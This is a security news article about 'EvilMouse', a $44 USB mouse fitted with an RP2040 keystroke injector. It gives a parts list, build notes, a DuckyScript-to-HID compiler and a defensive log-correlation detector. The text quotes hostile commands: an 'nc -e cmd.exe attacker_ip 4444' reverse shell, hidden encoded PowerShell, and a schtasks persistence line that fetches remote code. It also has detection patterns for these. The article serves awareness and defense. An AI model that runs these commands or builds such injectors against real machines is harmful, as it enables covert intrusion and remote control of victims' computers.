Security researcher NEWO-J has revealed "EvilMouse," a fully functional USB mouse that doubles as a covert keystroke injector, in a stark example of a low-cost hardware-based attack. The device, built from under $44 in parts, sidesteps the usual USB suspicion vectors (rogue thumb drives, for instance) by presenting itself as a Human Interface Device (HID) and delivering its payload automatically on connection.

The build, which uses an RP2040 Zero microcontroller board (the same RP2040 chip found in the Raspberry Pi Pico), highlights endpoint detection gaps in the face of growing physical-access threats.

Constructing EvilMouse

EvilMouse is modelled on Hak5's USB Rubber Ducky, but hides the malicious hardware inside an innocuous accessory. A mouse raises no red flags, particularly since its buttons and optical tracking still work, unlike a bare USB stick that security awareness training has taught employees to distrust. The bill of materials (BOM) breaks down as follows (approximate costs; the per-line figures sum to the stated total):

Component                  Qty   Approx. cost
RP2040 Zero (Adafruit)     1     $3
2-Port USB Hub Breakout    1     $5
Amazon Basics Mouse        1     $6
USB-C Pigtail Cable        1     $3
60/40 Rosin-Core Solder    1     $8
Flux Paste                 1     $8
USB-C Data Cable           1     $6
Kapton Tape                1     $5
Dupont Wires               4     ~$0.03 each
Total                            ~$44

The donor mouse's cramped shell demanded careful work. The first hurdles were removing the plastic ribbing with a multi-tool cutter and desoldering the white USB connector from the stock PCB with a flathead screwdriver.

Once flashed with CircuitPython firmware, the RP2040 Zero handles HID emulation and payload execution. Its emulated keystrokes mimic user input and, according to the researcher, stand up a reverse shell that evades Windows Defender within seconds. The code departs from the existing pico-ducky scripts, which target the original Pico boards and are not compatible with this one.

The core firmware logic spoofs HID reports over USB 2.0 to inject DuckyScript-style sequences: launching PowerShell (powershell.exe -WindowStyle Hidden -enc), base64-encoding payloads for obfuscation, and opening TCP connections (e.g., nc -e cmd.exe attacker_ip 4444, which presupposes a Netcat binary on the target). The source code is on GitHub at NEWO-J/evilmouse. It can be extended with Rust-based keystroke acceleration, DuckyScript compatibility, or persistence via scheduled tasks (schtasks /create /sc onlogon /tn EvilTask /tr "powershell -ep bypass -c Invoke-WebRequest...").
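As an added example (not code from the NEWO-J/evilmouse repository), the following Python compiles DuckyScript-style lines into the 8-byte USB boot-keyboard reports that a keystroke injector sends once the host has enumerated it as a keyboard. The key tables assume a US layout, the SAMPLE_SCRIPT is a constructed stand-in for the article's PowerShell launch (no real encoded payload), and the chord handling generalizes beyond the single "GUI r" step in the text to any modifier combination.

```python
"""DuckyScript-style lines compiled into USB HID boot-keyboard reports.

Constructed example (not the evilmouse firmware). Shows the raw 8-byte
report a keystroke injector sends over the HID interface, which the OS
accepts without any user confirmation once the device enumerates.
Report layout: [modifier bitmask, reserved 0, keycode1..keycode6].
A US keyboard layout is assumed.
"""
from typing import List, Tuple, Union

# Modifier bits in byte 0 of the boot-keyboard report (left-hand keys).
MOD = {"CTRL": 0x01, "SHIFT": 0x02, "ALT": 0x04, "GUI": 0x08, "WINDOWS": 0x08}

# Non-printable keys by their DuckyScript names -> HID usage IDs.
NAMED = {
    "ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A,
    "TAB": 0x2B, "SPACE": 0x2C, "DELETE": 0x4C,
    "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51, "UP": 0x52,
}

# Unshifted printable characters -> HID usage IDs (Keyboard/Keypad page).
_PLAIN = {chr(ord("a") + i): 0x04 + i for i in range(26)}
_PLAIN.update({str(d): 0x1E + d - 1 for d in range(1, 10)})
_PLAIN.update({
    "0": 0x27, "\n": 0x28, "\t": 0x2B, " ": 0x2C, "-": 0x2D, "=": 0x2E,
    "[": 0x2F, "]": 0x30, "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35,
    ",": 0x36, ".": 0x37, "/": 0x38,
})
# Characters that need SHIFT plus the unshifted key on the same keycap.
_SHIFTED = dict(zip("!@#$%^&*()", "1234567890"))
_SHIFTED.update({"_": "-", "+": "=", "{": "[", "}": "]", "|": "\\",
                 ":": ";", '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"})

Report = bytes
Step = Union[Report, Tuple[str, int]]  # a report, or ("delay", milliseconds)


def char_to_key(ch: str) -> Tuple[int, int]:
    """Return (modifier, keycode) for one printable character."""
    if ch in _PLAIN:
        return 0, _PLAIN[ch]
    if ch.isupper() and ch.lower() in _PLAIN:
        return MOD["SHIFT"], _PLAIN[ch.lower()]
    if ch in _SHIFTED:
        return MOD["SHIFT"], _PLAIN[_SHIFTED[ch]]
    raise ValueError(f"no US-layout mapping for {ch!r}")


def key_reports(modifier: int, keycode: int) -> List[Report]:
    """One key press = a press report followed by an all-zero release report."""
    return [bytes([modifier, 0, keycode, 0, 0, 0, 0, 0]), bytes(8)]


def compile_ducky(script: str) -> List[Step]:
    """Translate DELAY / STRING / named-key / modifier-chord lines into steps."""
    steps: List[Step] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            steps.append(("delay", int(arg)))
        elif cmd == "STRING":
            for ch in arg:
                steps.extend(key_reports(*char_to_key(ch)))
        elif cmd in NAMED and not arg:
            steps.extend(key_reports(0, NAMED[cmd]))
        else:
            # Chord such as "GUI r" or "CTRL ALT DELETE": OR the modifiers
            # together; the non-modifier token (if any) is the key.
            modifier, keycode = 0, 0
            for word in line.split():
                if word in MOD:
                    modifier |= MOD[word]
                elif word in NAMED:
                    keycode = NAMED[word]
                elif len(word) == 1:
                    extra, keycode = char_to_key(word)
                    modifier |= extra
                else:
                    raise ValueError(f"unknown DuckyScript token {word!r}")
            steps.extend(key_reports(modifier, keycode))
    return steps


# Constructed payload in the style the article describes, with a benign
# placeholder instead of a real encoded command.
SAMPLE_SCRIPT = """\
REM open the Run dialog and start a hidden PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
"""


def report_count(script: str) -> int:
    """Number of HID reports (press + release) the script emits, ignoring delays."""
    return sum(1 for s in compile_ducky(script) if isinstance(s, bytes))


if __name__ == "__main__":
    for step in compile_ducky(SAMPLE_SCRIPT):
        print(step if isinstance(step, tuple) else step.hex(" "))
```

Every printable character costs two reports (press and release), so a 30-character command line is 60 reports; a real injector only has to write each of these to the keyboard interface endpoint, which is why a host that trusts any enumerated HID has no way to tell them from a human's typing other than speed and timing.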

Demo footage shows an admin-level compromise: within five seconds of plugging EvilMouse into "Victim PC A," a shell lands on a Netcat listener on "Attacker PC B," giving remote code execution (RCE) with, per the demo, no EDR alerts. Hidden console windows (-WindowStyle Hidden) and WMI persistence add to the stealth. For high-security or air-gapped environments the consequences are dire: the payload executes locally from a USB port, so the initial compromise needs no network path into the target.

Although built for education and red teaming, EvilMouse exposes weaknesses in HID trust models: USB hubs relay whatever is plugged into them, and contemporary OSes (Windows 11, macOS Sonoma) enumerate a new mouse or keyboard automatically with no user confirmation. Defenses include physical port controls such as Kensington port locks, USB device allow-listing through Group Policy (Device Installation Restrictions), and endpoint behavioral analytics (such as CrowdStrike Falcon's HID monitoring). A practical check for the allow-list approach is to confirm it blocks a newly attached HID keyboard, not just storage-class devices, since EvilMouse enumerates as an input device. NEWO-J suggests future enhancements: multi-stage payloads, advanced AMSI bypasses (such as reflective PE loading), and remote activation via magic packets.
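To illustrate the behavioral-analytics defense, here is an added Python example (not CrowdStrike's logic or anything from the evilmouse project) that correlates a new HID keyboard enumerating with a hidden or encoded shell started seconds later on the same host, which is exactly the sequence a keystroke injector produces and a genuine mouse never should. The log records, their field names, the 10-second window and the indicator list are all constructed assumptions, not a real Windows event or EDR export.

```python
"""Correlate a new HID keyboard arriving with a hidden/encoded shell launched
seconds later on the same host.

Constructed example of a behavioural check that an injector trips: EvilMouse
enumerates as a keyboard and types a PowerShell one-liner within seconds.
The records below are simplified, hand-built JSON lines (assumed schema),
not a real Windows event log or EDR export.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

HID_WINDOW = timedelta(seconds=10)  # assumed: payload types within 10 s of plug-in
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SUSPICIOUS_ARGS = ("-windowstyle hidden", "-w hidden", "-enc", "-ep bypass",
                   "-executionpolicy bypass")

# Constructed log, one JSON object per line. "usb_device_arrival" carries the
# HID usage the OS enumerated; "process_create" carries image and command line.
# The -enc value decodes to "Start-Sleep 1" (UTF-16LE), a benign placeholder.
SAMPLE_LOG = r"""
{"ts": "2025-01-10T09:00:01", "host": "VICTIM-A", "kind": "usb_device_arrival", "hid_usage": "keyboard", "description": "USB Input Device"}
{"ts": "2025-01-10T09:00:04", "host": "VICTIM-A", "kind": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "explorer.exe", "cmdline": "powershell.exe -WindowStyle Hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="}
{"ts": "2025-01-10T09:00:05", "host": "VICTIM-A", "kind": "network_connect", "image": "powershell.exe", "dst": "203.0.113.10:4444"}
{"ts": "2025-01-10T09:30:00", "host": "VICTIM-A", "kind": "usb_device_arrival", "hid_usage": "mouse", "description": "USB Optical Mouse"}
{"ts": "2025-01-10T09:30:03", "host": "VICTIM-A", "kind": "process_create", "image": "C:\\Windows\\System32\\notepad.exe", "parent": "explorer.exe", "cmdline": "notepad.exe"}
{"ts": "2025-01-10T10:13:00", "host": "VICTIM-B", "kind": "usb_device_arrival", "hid_usage": "keyboard", "description": "USB Keyboard"}
{"ts": "2025-01-10T10:15:00", "host": "VICTIM-B", "kind": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "explorer.exe", "cmdline": "powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA="}
"""


def parse_log(text: str) -> List[Dict]:
    """Decode JSON lines, convert timestamps, and return events in time order."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def correlate(events: List[Dict], window: timedelta = HID_WINDOW) -> List[Dict]:
    """Flag a shell with injector-style arguments that starts within `window`
    of a HID *keyboard* enumerating on the same host. A mouse arrival alone,
    or a shell with no recent keyboard, does not fire this rule."""
    last_keyboard: Dict[str, datetime] = {}
    alerts = []
    for ev in events:  # already sorted, so gaps are never negative
        host = ev["host"]
        if ev["kind"] == "usb_device_arrival" and ev.get("hid_usage") == "keyboard":
            last_keyboard[host] = ev["ts"]
        elif ev["kind"] == "process_create":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if image not in SHELLS or host not in last_keyboard:
                continue
            gap = ev["ts"] - last_keyboard[host]
            hits = [a for a in SUSPICIOUS_ARGS if a in ev["cmdline"].lower()]
            if gap <= window and hits:
                alerts.append({"host": host, "image": image,
                               "seconds_after_hid": gap.total_seconds(),
                               "indicators": hits, "cmdline": ev["cmdline"]})
    return alerts


def detect(text: str) -> List[Dict]:
    """Run the correlation over raw JSON-lines text."""
    return correlate(parse_log(text))


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['host']}: {alert['image']} {alert['seconds_after_hid']:.0f}s "
              f"after HID keyboard arrival, indicators={alert['indicators']}")
```

The rule keys on the keyboard usage, not on the device's self-description, because EvilMouse's hub exposes a real mouse alongside the injector's keyboard interface; a rule that only watched for removable storage would see nothing. Widening the window to several minutes also flags the VICTIM-B sequence, so the window is a tuning knob between catching slow-starting payloads and paging on every user who plugs in a keyboard and then opens PowerShell.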

At $44 versus more than $100 for a commercial Rubber Ducky, this democratizes a sophisticated attack and should push CISOs to reconsider their peripheral supply chain.